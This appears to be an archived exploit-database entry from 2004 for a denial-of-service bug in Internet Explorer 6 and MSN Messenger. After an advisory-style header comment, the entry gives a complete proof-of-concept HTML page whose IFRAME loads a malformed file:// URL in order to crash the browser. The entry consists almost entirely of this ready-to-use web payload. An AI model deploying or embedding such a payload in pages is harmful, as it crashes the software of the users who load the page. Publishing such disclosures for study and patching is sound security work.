id: 5933
date: 12/21/2004
title: MS Internet Explorer & MSN Memory_Access_Violation DoS
author: Emmanouel Kellinis
cves: 

======================================================
MS Internet Explorer & MSN Memory_Access_Violation DoS
======================================================


<!--
#########################################
Application:    Internet Explorer
Vendors:        http://www.microsoft.com
Version:         6.0.2800
Platforms:      Windows
Bug:              IE and MSN Messenger
                     Memory_Access_Violation
Risk:             Critical
Exploitation:   Remote with browser
Date:             07 May 2004
Author:          Emmanouel Kellinis
e-mail:           me@cipher(dot)org(dot)uk
web:              http://www.cipher.org.uk
List :              BugTraq(SecurityFocus)
#########################################
-->

<HTML><BODY><IFRAME src="file://ю:/filename"></BODY></HTML>



#  0day.today [2023-03-23]  #